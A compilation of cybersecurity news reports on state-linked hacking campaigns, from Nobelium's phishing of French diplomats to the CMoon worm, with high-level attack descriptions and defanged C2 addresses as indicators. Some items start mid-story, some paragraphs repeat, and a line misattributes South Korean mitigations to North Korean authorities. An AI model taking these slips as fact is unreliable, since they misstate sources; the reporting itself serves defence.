French information security agency ANSSI reported that Russia-linked threat actor Nobelium is behind a series of cyber attacks that targeted French diplomatic entities.
The French information security agency ANSSI reported that Russia-linked APT Nobelium targeted French diplomatic entities. Despite the French agency linked the attacks to the cyberespionage group Nobelium (aka APT29, SVR group, Cozy Bear, Midnight Blizzard, BlueBravo, and The Dukes), ANSSI differentiates these groups into separate threat clusters, including a group named Dark Halo, which was responsible for the 2020 SolarWinds attack.
October 2020, used against high-value targets, most likely for espionage purposes. Western diplomatic entities, such as embassies and Ministries of Foreign Affairs, account for the majority of known victims of Nobelium. However, several IT companies have also reported that they have been targeted by Nobelium’s operators in late 2023 and 2024.
The report published by ANSSI is based upon elements collected by the French agency, evidence shared by its national partners (known as C4 members), and publicly available reports. The document warns of phishing campaigns conducted by Nobelium against French public and diplomatic entities aiming at gathering strategic intelligence.
“Nobelium is characterized by the use of specific codes, tactics, technics and procedures. Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies and consulates.” reads the report published by ANSSI. “These activities are also publicly described as a campaign called “Diplomatic Orbiter”.”
Attackers forge lure documents to target diplomatic staff, attempting to deliver their custom loaders to drop public post-exploitation tools such as Cobalt Strike or Brute Ratel C4. The tools allows attackers to access the victim’s network, perform lateral movements, drop additional payloads, maintain persistence, and exfiltrate valuable intelligence.
The agency confirmed that several IT companies have also reported being targeted by Nobelium in late 2023 and 2024.
“French public organisations have been targeted several times by phishing emails sent from foreign institutions previously compromised by Nobelium’s operators.” continues the report. “From February to May 2021, Nobelium operators conducted several phishing campaigns3 exploiting compromised email accounts belonging to the French Ministry of Culture and the National Agency for Territorial Cohesion (ANCT), sending an attachment called “Strategic Review”.”
In March 2022, a European embassy in South Africa received a phishing email that impersonated a French embassy, announcing the closure after a terrorist attack. The attackers sent the email from a compromised account of a French diplomat. In April and May 2022, Nobelium phishing messages reached dozens of email addresses from the French Ministry of Foreign Affair. Threat actors used themes like the closure of a Ukrainian embassy or a meeting with a Portuguese ambassador.
In May 2023, Nobelium targeted several European embassies in Kyiv, including the French embassy, with a phishing campaign involving an email about a “Diplomatic car for sale.” The ANSSI also reported a failed attempt to compromise the French Embassy in Romania.
“ANSSI has observed a high level of activities linked to Nobelium against the recent backdrop of geopolitical tensions, especially in Europe, in relation to Russia’s aggression against Ukraine. Nobelium’s activities against government and diplomatic entities represent a national security concern and endanger French and European diplomatic interests. The targeting of IT and cybersecurity entities for espionage purposes by Nobelium operators potentially strengthens their offensive capabilities and the threat they represent.” concludes the report that also provides indicators of compromise. “Nobelium’s techniques, tactics, and procedures remain mainly constant over time.”
The unauthorized access to the IT infrastructure of the company occurred on June 26, threat actors used the credentials of a standard employee account within its IT environment.
Upon detecting the suspicious activity by this account, the company immediately started the incident response measures.
“A comprehensive taskforce consisting of TeamViewer’s security team together with globally leading cyber security experts has worked 24/7 on investigating the incident with all means available. We are in constant exchange with additional threat intelligence providers and relevant authorities to inform the investigation.” reads the statement published by the company.
“Current findings of the investigation point to an attack on Wednesday, June 26, tied to credentials of a standard employee account within our Corporate IT environment. Based on continuous security monitoring, our teams identified suspicious behavior of this account and immediately put incident response measures into action. Together with our external incident response support, we currently attribute this activity to the threat actor known as APT29 / Midnight Blizzard. Based on current findings of the investigation, the attack was contained within the Corporate IT environment and there is no evidence that the threat actor gained access to our product environment or customer data.”
An update published by TeamViewer states that findings confirmed that the attack on its infrastructure was limited to its internal corporate IT environment and did not affect the product environment, connectivity platform, or any customer data.
The popular Ars Technica reporter Dan Goodin reported that an alert issued by security firm NCC Group reports a “significant compromise of the TeamViewer remote access and support platform by an APT group.”
In May 2019, the German newspaper Der Spiegel revealed that the German software company behind TeamViewer was compromised in 2016 by Chinese hackers.
According to the media outlet, Chinese state-sponsored hackers used the Winnti trojan malware to infect the systems of the Company.
The Winnti group was first spotted by Kaspersky in 2013, according to the researchers, the nation-state actor has been active since at least 2007.
The gang is financially-motivated and was mostly involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry, the majority of the victims are located in Southeast Asia.
The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.
According to the company, it was targeted by the hackers in autumn 2016, when its experts detected suspicious activities were quickly blocked them to prevent major damages.
TeamViewer spokesperson revealed that the company investigated the attempts of intrusion, but did not find any evidence of exposure for customer data and sensitive data.
Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.
“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.
“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”
At the time the company published a statement to exclude it was breached by hackers:
“Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.
Only in 2019, the company admitted it was breached in 2016.
Cisco fixed an actively exploited NX-OS zero-day, the flaw was exploited to install previously unknown malware as root on vulnerable switches.
Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score of 6.0), that the China-linked group Velvet Ant exploited to deploy previously unknown malware as root on vulnerable switches.
The flaw resides in the CLI of Cisco NX-OS Software, an authenticated, local attacker can exploit the flaw to execute arbitrary commands as root on the underlying operating system of an affected device.
“This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command.” reads the advisory published by Cisco. “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root.”
The IT giant pointed out that only attackers with Administrator credentials can successfully exploit this vulnerability on a Cisco NX-OS device.
In April 2024, researchers reported to the Cisco Product Security Incident Response Team (PSIRT) that the issue was actively exploited in the wild.
Cybersecurity firm Sygnia observed the attacks on April 2024 and reported them to Cisco.
“Sygnia identified that CVE-2024-20399 was exploited in the wild by a China-nexus threat group as a ‘zero-day’ and shared the details of the vulnerability with Cisco. By exploiting this vulnerability, a threat group – dubbed ‘Velvet Ant’ – successfully executed commands on the underlying operating system of Cisco Nexus devices.” reads the report published by Sygnia. “This exploitation led to the execution of a previously unknown custom malware that allowed the threat group to remotely connect to compromised Cisco Nexus devices, upload additional files, and execute code on the devices.“
The vulnerability impacts the following devices:
MDS 9000 Series Multilayer Switches (CSCwj97007)
Nexus 3000 Series Switches (CSCwj97009)
Nexus 5500 Platform Switches (CSCwj97011)
Nexus 5600 Platform Switches (CSCwj97011)
Nexus 6000 Series Switches (CSCwj97011)
Nexus 7000 Series Switches (CSCwj94682) *
Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009)
Cisco recommends customers monitor the use of credentials for the administrative users network-admin and vdc-admin.
Cisco provides the Cisco Software Checker to help customers determine if their devices are vulnerable to this flaw.
In late 2023, Sygnia researchers responded to an incident suffered by a large organization that they attributed to the same China-linked threat actor ‘Velvet Ant.’
The cyberspies deployed custom malware on F5 BIG-IP appliances to gain persistent access to the internal network of the target organization and steal sensitive data.
Multiple cybersecurity agencies released a joint advisory warning about a China-linked group APT40 ‘s capability to rapidly exploit disclosed security flaws.
Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. released a joint advisory warning about the China-linked group APT40 (aka TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Red Ladon, TA423, and Leviathan) and its capability to rapidly exploit disclosed flaws
The China-linked group was able to exploit vulnerabilities within hours or days of the public disclosure.
APT40 has previously targeted organizations in countries like Australia and the United States. The group is able to rapidly adapt vulnerability proofs of concept (POCs) for their operations. They identify new exploits in widely used public software, such as Log4J, Atlassian Confluence, and Microsoft Exchange, to target the associated infrastructure.
“APT 40 has previously targeted organizations in various countries, including Australia and the United States. Notably, APT 40 possesses the ability to quickly transform and adapt vulnerability proofs of concept (POCs) for targeting, reconnaissance, and exploitation operations.” reads the advisory. “APT 40 identifies new exploits within widely used public software such as Log4J, Atlassian Confluence and Microsoft Exchange to target the infrastructure of the associated vulnerability.“
In July 2021, the U.S. Justice Department (DoJ) indicted four members of the cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) for hacking tens of government organizations, private businesses and universities around the world between 2011 and 2018.
The APT40 group has been active since at least 2013, it is focused on targeting countries important to the country’s Belt and Road Initiative (i.e. Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).
The group appears to be focused on supporting the naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.
The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry. The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.
Three of the defendants are said to be officers in a provincial arm of the MSS and one was an employee of a front company that was used to obfuscate the government’s role in the hacking campaigns.
“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.” continues the joint advisory. “APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.”
APT40 use to exploit vulnerable public-facing infrastructure over other hacking techniques like phishing. They prioritize obtaining valid credentials for subsequent activities. The group often relies on web shells to maintain persistence early in an intrusion. Persistence is established early in an intrusion, making it likely to be observed in all cases, regardless of the level of compromise or further actions taken.
In the past, the APT40 was observed using compromised Australian websites as C2 servers, however he recently evolved this technique.
“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.” continues the report.
Many of the compromised SOHO devices are end-of-life or unpatched that can be easily hacked using N-day exploits. Compromised SOHO (Small Office/Home Office) devices provide attackers with a platform to launch attacks by mimicking legitimate traffic.
The report provides details about Tactics, Techniques, and Procesured associated by the the group and detection and mitigation recommendations.
Void Banshee APT group exploited the Windows zero-day CVE-2024-38112 to execute code via the disabled Internet Explorer.
An APT group tracked as Void Banshee was spotted exploiting the Windows zero-day CVE-2024-38112 (CVSS score of 7.5) to execute code through the disabled Internet Explorer.
The vulnerability is a Windows MSHTML Platform Spoofing Vulnerability. Successful exploitation of this vulnerability requires an attacker to take additional actions before exploitation to prepare the target environment. An attacker can trigger the issue by sending the victim a malicious file that the victim would have to execute.
Trend Micro researchers discovered that the flaw was actively exploited in the wild in May and reported it to Microsoft which addressed the zero-day with the July 2024 Patch Tuesday security updates.
Void Banshee was observed exploiting the CVE-2024-38112 flaw to drop the Atlantida info-stealer on the victims’ machines. The malware allows operators to gather system information and steal sensitive data, such as passwords and cookies, from multiple applications.
In the group’s attack chain, Void Banshee attempts to trick victims into opening zip archives containing malicious files disguised as book PDFs. The archives are disseminated in cloud-sharing websites, Discord servers, and online libraries, and other means. The APT group focuses on North America, Europe, and Southeast Asia.
“This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.” states Trend Micro.
Void Banshee exploited the disabled Internet Explorer process to run HTML Application (HTA) files using specially crafted .URL files with the MHTML protocol handler and the x-usc! directive. This technique resembles the exploitation of CVE-2021-40444, another MSHTML flaw that was exploited in zero-day attacks. The experts warn that this attack method is very concerning because Internet Explorer no longer receives updates or security fixes.
“In this attack, CVE-2024-38112 was used as a zero-day to redirect a victim by opening and using the system-disabled IE to a compromised website which hosted a malicious HTML Application (HTA)” states the report. “In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in the native Internet Explorer through the iexplore.exe process.”
Attackers used the internet shortcut file to direct the victims to an attacker-controlled domain where an HTML file downloads the HTA stage of the infection chain. The researchers noticed that Void Banshee uses this HTML file to control the window view size of Internet Explorer, hiding browser information and hiding the download of the next infection stage from the victim.
By default, IE prompts users to open or save the HTML application, but the APT group disguised the HTA file as a PDF by adding spaces to the file extension. Upon running the HTA file, a series of scripts is executed, along with the LoadToBadXml .NET trojan loader, the Donut shellcode, and the Atlantida stealer.
“In this campaign, we have observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE on their machine to infect users and organizations with ransomware, backdoors, or as a proxy to execute other strains of malware.” Trend Micro concludes. “The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users.”
China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) Evasive Panda has been spotted using an updated version of the macOS backdoor Macma.
The China-linked APT group Daggerfly (aka Evasive Panda or Bronze Highland) has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor.
“The Daggerfly (aka Evasive Panda, Bronze Highland) espionage group has extensively updated its toolset, introducing several new versions of its malware, most likely in response to exposure of older variants.” reads the report. “The new tooling was deployed in a number of recent attacks against organizations in Taiwan and a U.S. NGO based in China, which indicates the group also engages in internal espionage. In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware.“
The APT group was spotted using the malware families in attacks against Taiwanese organizations and a U.S. NGO in China. The attackers exploited an Apache HTTP server vulnerability to deliver their MgBot malware.
Daggerfly has been active for at least a decade, the group is known for the use of the custom MgBot malware framework. In 2023, Symantec identified a Daggerfly intrusion at an African telecom operator, using new MgBot plugins. This highlights the group’s ongoing evolution in cyber espionage tactics.
The Macma macOS backdoor was first detailed by Google in 2021 and has been used since at least 2019. At the time of discovery, threat actors employed the malware in watering hole attacks involving compromised websites in Hong Kong. The watering hole attacks used exploits for iOS and macOS devices. Attackers exploited the privilege escalation vulnerability CVE-2021-30869 to install Macma on macOS devices.
Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files.
Although Macma was widely used in cyber operations carried out by nation-state actors, it was not linked to a particular group. However, Symantec has found evidence to suggest that it is part of the Daggerfly toolkit. Two variants of the Macma backdoor C2 server (103.243.212[.]98) that was also used by an MgBot dropper.
In addition to this shared infrastructure, Macma and other malware in the Daggerfly’s arsenal, including Mgbot all contain code from a single, shared library or framework. Elements of this library have been used to build Windows, macOS, Linux, and Android threats. The functionality provided by this library includes:
Threading and synchronization primitives
Event notifications and timers
Data marshaling
Platform-independent abstractions (e.g. time)
The new variants used by Daggerfly implement the following additions/improvements:
New logic to collect a file’s system listing, with the new code based on Tree, a publicly available Linux/Unix utility.
Modified code in the AudioRecorderHelper feature
Additional parametrisation
Additional debug logging
Addition of a new file (param2.ini) to set options to adjust screenshot size and aspect ratio
The experts also observed another malware, tracked as Suzafk (aka ‘NetMM’, Nightdoor), in the group toolkit that ESET researchers linked to Evasive Panda in March.
“Suzafk is a multi-staged backdoor capable of using TCP or OneDrive for C&C. The malware contained the following configuration, indicating the functionality to connect to OneDrive is in development or present in other variants of the malware.” continues the report.
The backdoor includes the code from the al-khaser project, a public code repository developed to avoid detection by detecting virtual machines, sandboxes, and malware analysis environments.
The malware can also execute commands for network and system monitoring, such as ‘ipconfig,’ ‘systeminfo,’ ‘tasklist,’ and ‘netstat.’
“The [Daggerfly] group can create versions of its tools targeting most major operating system platforms.” concludes the report. “In addition to the tools documented here, Symantec has seen evidence of the ability to Trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS. Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption.”
Belarus-linked APT group GhostWriter targeted Ukrainian organizations with a malware family known as PicassoLoader, used to deliver various malicious payloads.
The Ukrainian Government’s Computer Emergency Response Team (CERT-UA) reported a surge in activity associated with the APT group UAC-0057 (aka GhostWriter) group between July 12 and 18, 2024. Threat actors distributed documents containing macros designed to deploy the PICASSOLOADER malware on victim computers, which then delivered the post-exploitation tool Cobalt Strike Beacon.
The attackers used bait documents related to local government reform (USAID/DAI “HOVERLA” project), taxation, and financial-economic metrics (“oborona.rar,” “66_oborona_PURGED.xls,” “trix.xls,” “equipment_survey_regions_.xls,” “accounts.xls,” “spreadsheet.xls,” “attachment.xls,” “Податок_2024.xls”).
“Based on this, it can be inferred that UAC-0057 might have targeted both project office specialists and their counterparts among the employees of relevant local government bodies in Ukraine.” reads the report published by CERT-UA.
The campaign was likely part of a broader cyber espionage activity against the Ukrainian government.
In November 2021, Mandiant Threat Intelligence researchers linked the Ghostwriter disinformation campaign (aka UNC1151) to the government of Belarus.
In August 2020, security experts from FireEye uncovered a disinformation campaign aimed at discrediting NATO by spreading fake news content on compromised news websites.
According to FireEye, the campaign tracked as GhostWriter, has been ongoing since at least March 2017 and is aligned with Russian security interests.
Unlike other disinformation campaigns, GhostWriter doesn’t spread through social networks, instead, threat actors behind this campaign abused compromised content management systems (CMS) of news websites or spoofed email accounts to disseminate fake news.
The operators behind Ghostwriter targeted Belarusian entities before the 2020 elections, some of the individuals (representatives of the Belarusian opposition) targeted by the nation-state actor were later arrested by the Belarusian government.
China-linked group APT41 breached a Taiwanese government-affiliated research institute using ShadowPad and Cobalt Strike.
Cisco Talos researchers reported that the China-linked group compromised a Taiwanese government-affiliated research institute. The experts attributed the attack with medium confidence to the APT41 group.
The campaign started as early as July 2023 and threat actors delivered the ShadowPad malware, Cobalt Strike, and other post-exploitation tools.
The sample of ShadowPad malware employed in this campaign exploited an outdated vulnerable version of Microsoft Office IME binary as a loader. The loader in turn loads the customized second-stage loader for launching the payload.
“Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups.” reads the report published by Cisco Talos. “Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.”
ShadowPad is a modular remote access trojan (RAT) sold exclusively to Chinese hacking groups. It has been publicly linked to APT41, a group believed to operate from Chengdu, China, and has also been used by other Chinese groups such as Mustang Panda and the Tonto Team.
The researchers were not able to determine the initial attack vector. The attackers compromised three hosts in the targeted environment and exfiltrated some documents from the network.
Attackers used a web shell to maintain persistence and drop additional payloads like ShadowPad and Cobalt Strike.
The attackers used a unique Cobalt Strike loader written in GoLang to bypass Windows Defender’s detection. This loader, derived from an anti-AV tool called CS-Avoid-Killing found on GitHub and written in Simplified Chinese, is promoted in various Chinese hacking forums and tutorials. The presence of Simplified Chinese file and directory paths suggests that the threat actors who created the loader are proficient in the language.
Attackers were also observed running PowerShell commands to execute scripts used to run the ShadowPad malware directly in memory and fetch Cobalt Strike malware from C2 server.
“During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.” continues the report. “The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as ‘ScatterBee’. Its technical structure and the names of its multiple components have remained consistent with earlier reports. The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old.”
Talos also discovered that APT41 created a custom loader to inject a proof-of-concept for CVE-2018-0824 directly into memory. The threat actors used a remote code execution vulnerability to achieve local privilege escalation.
“During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below.” continues the report. “The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other use is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.”
By analyzing artifacts from this campaign, the researchers identified samples and infrastructure potentially used by the same threat actors in different campaigns. Sharing these findings could help the community to make connections and enhance further investigations.
Talos released Indicators of Compromise for this campaign on their GitHub repository.
South Korea’s National Cyber Security Center (NCSC) reported that North Korea-linked hackers hijacked VPN software updates to deploy malware.
South Korea’s national security and intelligence agencies, including the National Intelligence Service, the Prosecutor’s Office, the Police Agency, the Military Intelligence Command, and the Cyber Operations Command, have issued a joint cybersecurity advisory to warn that North Korea-linked hackers exploited VPN software update to install malware on target networks.
According to the South Korean authorities, the government of Pyongyang’s goal is to steal intellectual property and trade secrets from the South.
North Korea-linked actors hacking groups are targeting South Korea’s construction and machinery industries. The advisory provides details on the tactics, techniques, and procedures (TTPs) employed by the attackers, as well as indicators of compromise (IoCs) for these attacks.
“Following the official announcement of the “Local Development 20×10 Policy” by Kim Jong-un at the 14th Supreme People’s Assembly on January 15 this year, North Korea has been pushing for the construction of modern industrial plants in 20 cities and counties annually. North Korean hacking organizations are also intensifying their efforts to support this policy.” reads the advisory. “It is suspected that North Korean hackers are stealing data from South Korea’s construction, machinery, and urban development sectors to support their industrial plant construction and local development plans.”
The North Korean APT groups Kimsuky and Andariel, both linked to the Reconnaissance General Bureau, are the main hacking groups involved. Their simultaneous and targeted attacks on specific sectors are considered unusual and experts highlighted that they necessitate careful preparation.
In January 2024, the Kimsuky APT group was spotted distributing malware through the website of a construction industry association in South Korea. The malware was concealed within security authentication software used during website login. The attack aimed at infecting PCs belonging to personnel from local governments, public institutions, and construction companies who accessed the site. This attack combined a “supply chain attack,” which involved tampering with legitimate distribution channels, with a “watering hole attack,” targeting websites frequently visited by construction and design professionals.
“When the tampered security authentication software installation file is executed, malware in the form of a DLL is run in the %APPDATA% directory, along with legitimate programs. This malware operates in the background to steal information, making it difficult for users to notice malicious activities. The malware, written in Go, is identified by some security firms as ‘TrollAgent’.” reads the advisory. “The malware has functionalities to collect system information, capture user screens, and gather information stored in browsers (credentials, cookies, bookmarks, history). It can also steal GPKI certificates, SSH keys, Sticky Notes, and FileZilla information from the infected PC.”
Another case detailed by the researchers took place in April 2024, when the Andariel hacking group exploited vulnerabilities in domestic VPN and server security software to distribute remote control malware, DoraRAT, to construction and machinery companies. The attackers manipulated the VPN client-server communication protocol to disguise malicious update files as legitimate ones. The compromised VPN client mistakenly accepted these files, leading to the execution of DoraRAT.
“The remote control malware (DoraRAT) used in the attack was simple and lightweight, focusing on basic functions like file upload/download and command execution. It was distributed using a watering hole technique, which increased its exposure. Unlike more sophisticated APT malware, DoraRAT had minimal functionality. Additionally, a file-stealing variant was identified, capable of exfiltrating large files related to machinery and equipment design.” continues the joint advisory. “Andariel also exploited vulnerabilities in server security products, demonstrating a trend of targeting IT management software for mass infections due to their high-level access and control.”
Below are the mitigations provided by North Korean authorities:
Organizations managing websites in sectors like construction and machinery should seek security assessments from relevant institutions if needed.
Ongoing security training for all organizational members, including IT and security staff, is crucial.
Keep operating systems and applications up-to-date, and use updated antivirus software with real-time detection.
Implement strict approval policies for software distribution to prevent vulnerabilities in automated deployment.
Stay informed about government cybersecurity advisories and act promptly on manufacturer recommendations.
Refer to guidelines for software supply chain security and software development security provided by national authorities.
A China-linked APT, tracked as StormBamboo, compromised an internet service provider (ISP) to poison software update mechanisms with malware.
Volexity researchers reported that a China-linked APT group, tracked as StormBamboo (aka Evasive Panda, Daggerfly, and StormCloud), successfully compromised an undisclosed internet service provider (ISP) in order to poison DNS responses for target organizations.
The threat actors targeted insecure software update mechanisms to install malware on macOS and Windows victim machines.
In mid-2023, Volexity discovered multiple malware infections affecting macOS and Windows systems within victim organizations. The company linked the attacks to StormBamboo APT group. Upon investigating the incidents, the researchers determined that a DNS poisoning attack at the ISP level caused the infection. The attackers altered DNS responses for domains related to software updates to deploy multiple malware families, including MACMA and POCOSTICK (MGBot). The attacker’s methods resemble those of DriftingBamboo, suggesting a possible connection between the two threat actors.
Daggerfly has been active for at least a decade, the group is known for the use of the custom MgBot malware framework. In 2023, Symantec identified a Daggerfly intrusion at an African telecom operator, using new MgBot plugins. This highlights the group’s ongoing evolution in cyber espionage tactics.
The Macma macOS backdoor was first detailed by Google in 2021 and has been used since at least 2019. At the time of discovery, threat actors employed the malware in watering hole attacks involving compromised websites in Hong Kong. The watering hole attacks used exploits for iOS and macOS devices. Attackers exploited the privilege escalation vulnerability CVE-2021-30869 to install Macma on macOS devices.
Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files.
Although Macma was widely used in cyber operations carried out by nation-state actors, it was not linked to a particular group.
“During one incident investigated by Volexity, it was discovered that StormBamboo poisoned DNS requests to deploy malware via an HTTP automatic update mechanism and poison responses for legitimate hostnames that were used as second-stage, command-and-control (C2) servers.” reads the report published by Volexity. “The DNS records were poisoned to resolve to an attacker-controlled server in Hong Kong at IP address 103.96.130[.]107. Initially, Volexity suspected the initial victim organization’s firewall may have been compromised. However, further investigation revealed the DNS poisoning was not performed within the target infrastructure, but further upstream at the ISP level.”
Volexity promptly alerted the ISP, which then investigated key traffic-routing devices on their network. After rebooting and taking parts of the network offline, the DNS poisoning stopped. The researchers were not able to identify a specific compromised device, however updating or deactivating various infrastructure components effectively ended the malicious activity.
“The logic behind the abuse of automatic updates is the same for all the applications: the legitimate application performs an HTTP request to retrieve a text-based file (the format varies) containing the latest application version and a link to the installer.” continues the report. “Since the attacker has control of the DNS responses for any given DNS name, they abuse this design, redirecting the HTTP request to a C2 server they control hosting a forged text file and a malicious installer. The AiTM workflow is shown below.”
StormBamboo targeted various software vendors with insecure update mechanisms, using complex methods to deploy malware. For example, they targeted 5KPlayer’s update process for the “youtube-dl” dependency to deliver a backdoored installer from their C2 servers. Once compromised systems, the attackers installed a malicious Google Chrome extension called ReloadText to steal browser cookies and email data.
“The incident described in this blog post confirms the supposition made by ESET concerning the infection vector for the POCOSTICK malware. The attacker can intercept DNS requests and poison them with malicious IP addresses, and then use this technique to abuse automatic update mechanisms that use HTTP rather than HTTPS.” concludes the report. “This method is similar to the attack vector Volexity previously observed being used by DriftingBamboo following the 0-day exploitation of Sophos Firewalls.”
Cybersecurity analysts have uncovered critical details about the North Korean advanced persistent threat (APT) group Kimsuky, which has been targeting universities as part of its global espionage operations.
Kimsuky, active since at least 2012, primarily targets South Korean think tanks and government entities, though its reach extends to the US, the UK and other European nations. The group specializes in sophisticated phishing campaigns, often posing as academics or journalists to infiltrate networks and steal sensitive information.
Recent Findings and Tactics
According to a new advisory published by Resilience today, its analysts capitalized on Kimsuky’s operational security mistakes, which led to the collection of source code, login credentials and other crucial data.
The data revealed that Kimsuky has been phishing university staff, researchers and professors, aiming to access and exfiltrate valuable research and intelligence. Once inside university networks, the group was observed stealing information critical for North Korea, particularly given the country’s limited scientific community.
The group’s actions align with the objectives of the Reconnaissance General Bureau (RGB), North Korea’s primary foreign intelligence agency.
Historically, Kimsuky has been linked to attempts to steal sensitive data, including nuclear research, healthcare innovations and pharmaceutical secrets. There is also evidence suggesting that Kimsuky engages in financially motivated cybercrime, potentially as a means to fund its espionage activities.
Resilience’s new findings shed light on Kimsuky’s methods, particularly its use of phishing pages that mimic legitimate university login portals. By altering the code of these pages, Kimsuky can capture the credentials of unsuspecting victims. Notably, the group has targeted institutions such as Dongduk University, Korea University and Yonsei University.
The operation also highlighted Kimsuky’s use of a custom tool called “SendMail,” which was deployed to send phishing emails using compromised email accounts. These emails were carefully crafted to deceive recipients into providing their login information, furthering Kimsuky’s espionage efforts.
According to Resilience, the breadth and depth of Kimsuky’s tactics underscore the persistent and evolving threat posed by state-backed cyber groups.
Recommendations for Organizations
To tackle this threat, the security firm recommended leveraging phish-resistant multifactor authentication (MFA), such as FIDO-compliant hardware tokens or push-based mobile applications.
Additionally, users should always double-check that the URL they are logging into matches the page they expect to be on, as some password managers can assist with this automatically.
Finally, organizations are encouraged to review and test Breach and Attack Simulation packages that simulate Kimsuky activity to better prepare for potential attacks.
A new self-spreading worm named ‘CMoon,’ capable of stealing account credentials and other data, has been distributed in Russia since early July 2024 via a compromised gas supply company website.
According to Kaspersky researchers who discovered the campaign, CMoon can perform a broad range of functions, including loading additional payloads, snapping screenshots, and launching distributed denial of service (DDoS) attacks.
Judging from the distribution channel the threat actors used, their targeting scope is focused on high-value targets rather than random internet users, which indicates a sophisticated operation.
Distribution mechanism
Kaspersky says the infection chain begins when users click on links to regulatory documents (docx, .xlsx, .rtf, and .pdf) found on various pages of a company’s website that provides gasification and gas supply services to a Russian city.
The threat actors replaced the document links with links to malicious executables, which were also hosted on the site and delivered to the victims as self-extracting archives containing the original document and the CMoon payload, named after the original link.
“We have not seen other vectors of distribution of this malware, so we believe that the attack is aimed only at visitors to the particular site,” reports Kaspersky.
After the gas firm was notified of this compromise, the malicious files and links were removed from its website on July 25, 2024.
However, due to CMoon’s self-propagation mechanisms, its distribution may continue autonomously.
CMoon is a .NET worm that copies itself to a newly created folder named after the antivirus software it detected on the compromised device or one resembling a system folder if no AVs are detected.
The worm creates a shortcut on the Windows Startup directory to ensure it runs on system startup, securing persistence between reboots.
To avoid raising suspicions during manual user checks, it alters its files’ creation and modification dates to May 22, 2013.
The worm monitors for newly connected USB drives, and when any are hooked up on the infected machine, it replaces all files except for ‘LNKs’ and ‘EXEs’ with shortcuts to its executable.
